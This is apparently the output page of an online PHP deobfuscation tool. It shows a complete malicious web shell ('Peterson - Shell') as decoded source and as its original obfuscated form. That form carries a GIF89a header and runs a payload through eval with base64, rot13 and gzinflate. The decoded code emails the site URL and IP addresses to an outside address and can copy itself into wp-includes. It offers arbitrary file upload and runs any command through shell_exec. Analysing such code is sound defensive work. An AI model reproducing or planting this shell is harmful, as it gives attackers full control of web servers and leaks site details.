Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

GIF89a???????????!??????,???????D?;?<?php $language = 'eng'; $auth = 0; $name =..

Decoded Output download

@ini_restore("disable_functions");
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get  disable!';
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/petx.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Peterson - Shell</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get  disable!';
if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

Did this file decode correctly?

Original Code

GIF89a???????????!??????,???????D?;?<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$rhs = 'rUh6QuNTEP5cfsWyjWEdHSRcq1cnwAhXnCNFVnUc+gWQ5dgT2Du/ybsmpIj/3pldOy/HWHZokRDJzDPvz84cy1kGJSidl+DwS6pjmkAwq7JVyzxGvH2wJXTM2ZZXgWlNge/5/mA0vBLT8Hj4Wty02z89YbXupZI6yqtZM5ftHXm15jDFYgQf/+WNr/jZcWURnI38Cb9Orcy+YXXH3p+Xnj8JLscDo5/m8QIBPIxQtgizW4YGEHZpnZFwMueIReEM0r0YEGxZSNxvgoKETprHIJrMl7g2e3kpiKpF6gU690L6XmM+6mx1P+r3+cHTFiQK3gANEYNk45kr6muM1R3bFpQQlAWULsrvZaWniyxZwUxJKez/4KTXG3DfeRvgGzYefb9zM/bOVBNicpOGMmRrARrKOIFbyOLjMEI6RJ7yHcZa4/gOPwuVWdjvNKEwcGpNF/vdYdM6eW9G4Gg2uGA+lPdAOdT5X3QMpQPT8bxRZJMmZOE5AezAl717pv/4kZomdEHDoC/e5FdRVp4BsQfJo/KqjGCdEMI/HQ8uJk5/8Ic3PDn3BJEiU5JX5q5AvdHp5bk3nATj0XUiYTq8Oy9pchYlFU+72KOHQWRKIEZXsF21gWmYaNWmrH8cifbfUKJ9WKItiO5lxg+11AkcXdA0SJ6xXebfTpIcaa38Y02aP6ygxs9lfGBX/g3uLyzKE5zOz5/NB2RUvLOM2eGH3XZw209MQ+F5Xe7wDtYXoABboo3Qdmpr+50RLhGPJUcyaY2jZ4Ff0cEyT4ez25Xy9nvlTUXvClRGw2ucxhhHc4bt/+yldB8o6zcrjTwevPqIkajOZLP+AmuQVyunToppm334wBwhXNchFyvKPNuciFJp2wyHo6GHcCdz1BI0Jh40dUnMsUoMH1A0j+06iFVv8nZIrtJyTOTKIfWO6AptN1OzWqoEMqN2735PbAm6KjNTgg5PeFM+ronpTk3pWN6vr9/vHrGv+TchqEmB8ylGltKGUGFc0BFgoSnb5fzo7emd5nYac2Qz81CZFZVzbUSAyzU8dc6IFi6P0phid/13msqV3vrh7D5ZKvP7G+K7lNmRONhVFGMkxlBNJU0WbqkNeTcOaNgk3kdQxfxYBZdSkocx68sEWRVdTz8r5kHGMXFossqmvgGYoX2tpsdRP2wd87P19nMWUJgb6322nsSaf3emtf70Wx0ngzl94SxXT6VcHWEY2CR4HZ/qcnh6wevdXVv+1LArbnrr9V8ZfCzpBBVY0mK3WRKNUp0LmjwahbkWZx78K9H0UNwgzoCIgHZ+D4H1DWRAbedSC50WgbXCw7DMpXCi2Ed+iCes1L78hg9ryCHGHfbE7MFgG3e/iiJDinYUaL5qhnhpv4dYjD3hG3vW3JrqaGrxbphe1bo0pltN782ihGja/NrQc8988KAoOlS4BCFlyJFMvpY5XbLlq7vP/odYkSi2m4TiJbf/AA==';
eval(gzinflate(str_rot13(base64_decode($rhs))));
?>

Function Calls

gzinflate	1
str_rot13	1
base64_decode	1
error_reporting	1

Variables

$rhs	rUh6QuNTEP5cfsWyjWEdHSRcq1cnwAhXnCNFVnUc+gWQ5dgT2Du/ybsmpIj/..
$auth	0
$name
$pass
$language	eng

Stats

MD5	731967e1012b4e31cf9e516b60719f8e
Eval Count	1
Decode Time	114 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats